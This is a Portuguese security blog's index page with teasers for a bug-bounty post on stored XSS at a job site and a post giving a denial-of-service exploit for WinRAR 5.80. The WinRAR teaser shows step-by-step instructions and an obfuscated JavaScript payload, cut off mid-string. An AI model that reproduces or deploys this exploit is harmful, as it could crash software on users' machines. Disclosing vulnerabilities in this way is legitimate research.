XSS Armazenado em Site de Empregos - Bug Bounty PoC 7

XSS Armazenado em Site de Empregos – Bug Bounty PoC

E ai pessoal, tudo bem com vocês? Hoje eu trouxe uma prova de conceito de um bug bounty que realizei há alguns meses atrás, trata-se de um Cross-Site Scripting (XSS) Armazenado em um site de empregos. O site possibilita o envio do nosso currículo em PDF, armazenando em nosso perfil e criando uma página para acessar …

XSS Armazenado em Site de Empregos – Bug Bounty PoC Leia mais »

DoS no WinRAR

DoS no WinRAR

Fala pessoal, tudo bem com vocês? Hoje trago um exploit de negação de serviço direcionado a uma falha do WinRAR 5.80 64bits. 1 – Crie um arquivo html com o seguinte código: <script type=”text/javascript”> //<![CDATA[ <!– var x=”function f(x){var i,o=\”\”,l=x.length;for(i=l-1;i>=0;i–) {try{o+=x.c” + “harAt(i);}catch(e){}}return o;}f(\”)\\\”function f(x,y){var i,o=\\\”\\\\\\\””+ “\\\\,l=x.length;for(i=0;i<l;i++){if(i==28)y+=i;y%=127;o+=String.fromCharCod” + “e(x.charCodeAt(i)^(y++));}return o;}f(\\\”\\\\xr}jMDLW\\\\\\\\nRTN\\\\\\\\\\”+ “\\\\\\LFE\\\\\\\\004\\\\\\\\017\\\\\\\\022GD\\\\\\\\\\\\\\\\^\\\\\\\\rhGjYh” + “83#9y2/(-s:\\\\\\\\021\\\\\\\\024\\\\\\\\013\\\\\\\\025Y9D\\\\\\\\037E\\\\\\”+ “\\034\\\\\\\\013F\\\\\\\\017\\\\\\\\002\\\\\\\\003\\\\\\\\037\\\\\\\\021\\\\”+ “\\\\005\\\\\\\\033\\\\\\\\021\\\\\\\\030\\\\\\\\020*UX\\\\\\\\032\\\\\\\\02” …

DoS no WinRAR Leia mais »